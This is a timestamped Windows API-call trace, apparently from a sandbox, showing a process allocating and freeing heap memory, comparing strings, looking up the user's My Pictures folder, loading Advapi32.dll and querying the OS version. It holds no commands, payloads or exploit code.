[0264.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0264.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0264.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0264.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0264.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0264.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0264.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0264.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0264.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0264.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0264.529] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0264.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0264.529] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0264.529] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0264.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0264.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0264.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d38 [0264.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0264.529] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0264.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0264.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0264.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0264.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0264.530] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0264.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0264.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0264.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0264.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0264.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0264.530] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0264.530] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.530] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0264.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0264.530] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0264.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0264.530] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0264.531] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0264.531] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/My Pictures", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x26df0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 0xaa5960 [0264.531] FindClose (in: hFindFile=0xaa5960 | out: hFindFile=0xaa5960) returned 1 [0264.531] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0264.531] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0264.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0264.531] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0264.531] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0264.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0264.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.532] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0264.532] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.532] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0264.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0264.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0264.532] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0264.532] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0264.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.532] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0264.533] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0264.533] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0264.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.533] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0264.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0264.533] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0264.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0264.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0264.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.534] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0264.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.534] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0264.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0264.534] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0264.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0264.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1708 [0264.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0264.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0264.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0264.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0264.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0264.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0264.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0264.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0264.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0264.535] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0264.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0264.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0264.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0264.536] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0264.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0264.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0264.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0264.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0264.536] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0264.536] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0264.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0264.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0264.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0264.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.537] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0264.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0264.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0264.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.537] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0264.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0264.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0264.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0264.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0264.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0264.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0264.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0264.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.538] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0264.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0264.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0264.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0264.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0264.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0264.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0264.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0264.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0264.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0264.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0264.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.540] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0264.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0264.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0264.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0264.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0264.540] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 